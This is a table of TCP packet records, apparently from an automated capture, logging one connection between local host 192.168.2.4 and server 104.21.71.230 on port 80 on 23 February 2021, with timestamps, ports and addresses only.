Feb 23, 2021 15:31:13.428432941 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.428455114 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.428503036 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.429310083 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.429333925 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.429369926 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.432662010 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.432812929 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.432915926 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.433259964 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.433290958 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.433320999 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.433449030 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.433478117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.433573961 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.433578968 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.433602095 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.433628082 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.434088945 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.434118986 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.434187889 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.434622049 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.434649944 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.434719086 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.435606956 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.435637951 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.435678005 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.436708927 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.436752081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.436836958 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.437306881 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.437339067 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.437443972 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.438218117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.438249111 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.438324928 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.439121008 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.439161062 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.439198017 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.440318108 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.440371037 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.440448046 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.440856934 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.440902948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.440917969 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.441790104 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.441833973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.441919088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.442631960 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.442687988 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.442730904 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.443562031 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.443607092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.443633080 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.444451094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.444494963 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.444559097 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.445343018 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.445430994 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.445431948 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.446214914 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.446320057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.446388006 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.447073936 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.447128057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.447145939 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.453130960 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.453177929 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.453210115 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.453567028 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.453610897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.453680992 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.454396009 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.454437971 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.454463959 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.455262899 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.455305099 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.455338001 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.456156015 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.456207037 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.456280947 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.457010984 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.457102060 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.457165956 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.457901955 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.457963943 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.457973957 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.460788965 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.460832119 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.460903883 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.461220980 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.461267948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.461283922 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.464715958 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.464765072 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.464796066 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.469747066 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.469794989 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.469876051 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.470077038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.470118999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.470242023 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.471002102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.471074104 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.471132994 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.471870899 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.471914053 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.471946955 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.474170923 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.474239111 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.474257946 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.474706888 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.474757910 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.474761963 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.475878000 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.475927114 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.475970984 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.477701902 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.477757931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.477865934 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.478456974 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.478499889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.478548050 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.478569984 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.478595018 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.478650093 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.478908062 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.478950977 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.478961945 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.479796886 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.479851007 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.479914904 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.480582952 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.480633974 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.480709076 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.484314919 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.484385967 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.484538078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485208035 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485239029 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485268116 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485291958 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485301971 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.485311031 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485315084 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.485338926 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485363007 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485390902 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.485415936 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.485743999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485770941 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485799074 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485825062 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.485836983 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.485872984 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.486232996 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.486296892 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.486363888 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.486985922 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.487052917 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.487123966 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.487735033 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.487793922 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.488209963 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.491020918 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.491105080 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.491184950 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.492331028 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.492361069 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.492383957 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.492408037 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.492429018 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.492429972 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.492453098 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.492464066 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.492492914 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.492835999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.492858887 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.492917061 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.493535995 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.493593931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.494065046 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.494087934 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.494127989 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.494151115 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.494884968 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.494910002 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.494971037 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.495670080 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.495691061 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.495846033 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.496505976 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.496539116 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.496787071 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.496808052 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.496839046 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.496855021 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.497510910 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.497536898 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.497634888 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.498306036 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.498332024 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.498425007 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.498703957 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.498857021 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.499501944 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.499525070 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.499639988 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.500222921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.500243902 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.500307083 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.500946045 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.500967026 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501017094 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.501342058 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501363993 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501421928 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.501753092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501785994 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501816034 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501842022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501867056 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501893044 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.501914978 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.501935005 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.501939058 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.502563000 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.502626896 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.502652884 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.502685070 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.505745888 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.505899906 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.505974054 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.506027937 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.506091118 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.507126093 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507153034 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507178068 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507210016 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.507364035 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507390022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507419109 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.507428885 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507472992 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.507498980 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507524014 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507550001 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.507601976 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.508162975 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.508194923 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.508224964 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.508255005 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.508263111 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.508276939 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.508291960 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.508326054 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.508372068 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.508698940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.508734941 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.508759022 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.508760929 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.509505987 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.509561062 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.509574890 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.509593964 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.509604931 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.510361910 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.510389090 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.510412931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.510452986 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.510473013 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.511136055 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.511195898 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.511221886 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.511266947 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.514220953 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.514337063 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.514400005 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.514439106 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.514522076 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.515878916 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.515914917 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.515949965 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.515981913 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516005993 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.516015053 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516048908 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516067982 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.516088963 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516128063 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516143084 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.516160965 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516172886 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.516618967 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516741991 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516808033 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.516855001 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.516907930 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.517654896 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.517690897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.517724991 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.517792940 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.518420935 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.518457890 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.518490076 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.518515110 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.518567085 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.519196033 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.519229889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.519269943 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.519290924 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.520016909 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.520050049 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.520070076 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.520091057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.520718098 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.520751953 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.520777941 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.520785093 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.520811081 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.521039963 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.521074057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.521089077 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.521114111 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.521150112 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.521182060 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.521208048 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.521214008 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.521229029 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.521248102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.521280050 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.521325111 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.523217916 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.523268938 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.523298979 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.523312092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.523351908 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.523391008 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.523396969 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.523437977 CET	49752	80	192.168.2.4	104.21.71.230
